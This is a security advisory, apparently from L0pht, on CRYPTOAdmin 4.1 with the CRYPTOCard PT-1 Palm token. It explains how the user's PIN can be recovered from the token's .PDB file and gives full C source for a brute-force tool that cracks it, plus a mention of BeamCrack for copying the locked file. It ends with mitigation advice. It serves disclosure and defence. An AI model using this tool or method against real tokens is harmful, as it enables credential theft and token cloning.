COMMAND

    CRYPTOAdmin server

SYSTEMS AFFECTED

    CRYPTOAdmin 4.1 server with CRYPTOCard PT-1 token 1.04

PROBLEM

    Following  is  based  L0pht  Research  Labs  Security  Advisory by
    Kingpin and Dildog.   CRYPTOCard's CRYPTOAdmin software is  a user
    authentication administration system  which uses various  hardware
    and  software  token  devices  for  challenge/response.  Using the
    user's  PIN  number  ("what  you  know")  and the token ("what you
    have"),  the  correct  response  will  be  calculated based on the
    challenge prompted from the CRYPTOAdmin server.

    The  PT-1  token,  which  runs  on  a PalmOS device, generates the
    one-time-password response. A  PalmOS .PDB file is created by  the
    CRYPTOAdmin software for each user.  The .PDB file is loaded  onto
    the  Palm  device.   The  user  name,  serial number, key, and PIN
    number  are  all  stored  in  this  file  in  either  encrypted or
    plaintext  form.   By  gaining  access  to  the  .PDB  file,   the
    legitimate user's PIN  can be determined  through a series  of DES
    decrypts-and-compares.

    Having both the .PDB and the PIN number will allow an attacker  to
    clone the  token on  another Palm  device and  generate the proper
    responses given the challenge from the CRYPTOAdmin server.   Using
    the demonstration tool below, the  PIN can be determined in  under
    5 minutes on a Pentium III 450MHz.

    The PalmOS PT-1 application requires  the user to enter their  PIN
    number before the challenge/response  information is granted.   If
    the .PDB file of  the legitimate users gets  into the hands of  an
    attacker, they will easily be  able to extract the legitimate  PIN
    using the demonstration tool below.

    The PalmOS platform  is inherently insecure  and was not  designed
    for security-related applications.   Any application and  database
    information can be accessed and modified by any other application.
    In the past, tokens used to generate one-time-passwords were often
    tamper-evident hardware devices.   These devices are difficult  to
    reverse-engineer and will sometimes erase critical information  if
    tampering is detected.  The software token, such as the PT-1  Palm
    token, allows the functionality  of a previously secure  device to
    be executed on an insecure platform.  Methods to determine program
    operation  is  much  easier  in  this fashion, making the software
    tokens less secure and causing a weak link in the security chain.

    The  .PDB  file,  containing  the  critical  information,  can  be
    accessed from either the user's desktop PC or Palm device.  PalmOS
    HotSync often stores  a copy of  the application, once  sync'ed to
    the Palm, in the /Palm/<user>/Backup directory. If a new .PDB file
    is  pending  for  sync   to  the  Palm,  it   is  stored  in   the
    /Palm/<user>/Install directory.

    If an attacker has temporary  access to the user's Palm,  they can
    transfer the .PDB file to  their own Palm device using  the PalmOS
    "Beam"  functionality.  CRYPTOCard   intentionally  prevents   the
    beaming of  their database  by setting  the PalmOS  lock bit,  but
    using BeamCrack, a L0pht Heavy  Industries tool, the lock bit  can
    be removed and the database can be beamed.

    The  information  we  need  from  the  .PDB,  which  is  an 8-byte
    ciphertext string,  is located  from address  $BD to  $C4.  Simply
    open the .PDB file in a hex editor to extract the bytes.

    The DES key  is generated based  on the entered  PIN number and  a
    fixed 4-byte value, $247E 3E6C.  If the administrator issues  PINs
    with less than  8 digits, the  PIN is padded  up to 8  digits with
    45678 (i.e.  if PIN  is 9999,  it will  be padded  to be 99995678)
    before the DES key is generated.

    If  the  entered  PIN  is  correct,  the DES decrypt will output a
    plaintext  of  $636A  2A3F  256D  676C.   If  the  entered  PIN is
    incorrect, the plaintext output  will be different, since  the key
    used to decrypt the information was incorrect.

        ciphertext from .PDB -> DES Decrypt -> plaintext known
                                            ^
                                            |
                        key = (entered PIN) w/ fixed value

    An example PIN authentication routine is as follows:

        1) Ciphertext from .PDB = $11FB 32C3 80EE 9318
        2) Entered PIN number * 9 = 26745678 * 9 = $0E58 F5BE
        3) Key = $0E58 F5BE 247E 3E6C
        4) DES decrypt -> plaintext = $636A 2A3F 256D 676C
        5) If plaintext = $636A 2A3F 256D 676C, PIN is good!

    By creating  a key  based on  each possible  8-digit PIN,  ranging
    from 00000000 to 99999999, and performing decrypt-and-compare, the
    PIN can be brute-forced in a trivial amount of time.  On a Pentium
    III 450MHz running  Windows NT 4.0,  the 100,000,000 PIN  attempts
    can be completed in under 5 minutes.

    The  demonstration  tool,  in  form  of  an  application, has been
    written for both Unix and  Windows PC platforms.  Source  code for
    Unix, which uses  Eric Young's libdes  library, is below.   The PC
    version can be found at

        http://www.L0pht.com/~kingpin

    The code:

    #include<stdio.h>
    #include<des.h>
    
    int main(int argc, char **argv)
    {
            des_cblock in,out,key,valid = {0x63, 0x6A, 0x2A, 0x3F,
                                         0x25, 0x6D, 0x67, 0x6C};
            des_key_schedule sched;
            unsigned long massaged;
            FILE *pdb;
    
            if (argc == 1)
            {
                    fprintf(stdout, "\nUsage: %s <.PDB filename>\n\n", argv[0]);
            return 1;
            }
    
            fprintf(stdout, "\nCRYPTOCard PT-1 PIN Extractor\n");
            fprintf(stdout, "kingpin@atstake.com\n");
            fprintf(stdout, "@Stake L0pht Research Labs\n");
            fprintf(stdout, "http://www.atstake.com\n\n");
    
            if((pdb = fopen(argv[1], "rb")) == NULL)
            {
                    fprintf(stderr, "Missing input file %s.\n\n", argv[1]);
                    return 1;
            }
    
            fseek(pdb, 189L, SEEK_SET);
            if (fread(in, 1, 8, pdb) != 8)
            {
                    fprintf(stderr, "Error getting ciphertext string.\n\n");
                    return 1;
            }
    
            fclose(pdb);
    
            key[4] = 0x24;
            key[5] = 0x7E;
            key[6] = 0x3E;
            key[7] = 0x6C;
    
            for (massaged = 0; massaged < 900000000; massaged += 9)
            {
                    key[0]=(massaged>>24) & 0xff;
                    key[1]=(massaged>>16) & 0xff;
                    key[2]=(massaged>>8) & 0xff;
                    key[3]=(massaged) & 0xff;
    
                    des_set_key(&key,sched);
                    des_ecb_encrypt(&in,&out,sched,DES_DECRYPT);
    
                    if (memcmp(out, valid, 8) == 0)
                    {
                            fprintf(stdout, "\n\nPIN: %d", massaged/9);
                    break;
                    }
    
                    if ((massaged % 900000) == 0)
                    {
                    fprintf(stdout, "#");
                    fflush(stdout);
                    }
            }
    
            fprintf(stdout, "\n\n");
            return 0;
    }

SOLUTION

    The quick solution, although it does not remedy the core  problem,
    is to  confirm that  the .PDB  file is  not stored  on the  user's
    desktop machine after it has  been loaded onto the PalmOS  device.
    A global find for *.PDB will enable you to find all .PDB files  on
    the user's machine.  It is highly recommended that extreme caution
    is taken to prevent compromise of the .PDB files.

    Changing  the  PIN  numbers  on  a  daily  or weekly basis is also
    recommended.

    A longer term solution, especially if the PT-1 tokens are  already
    deployed, would  be to  move to  a tamper-evident  hardware token,
    such  as  the  CRYPTOCard  RB-1  or  KF-1 devices.  These physical
    pieces of  hardware are  much more  secure, due  to the  fact that
    they are  dedicated to  one function  and it  is more difficult to
    extract the PIN information from the devices.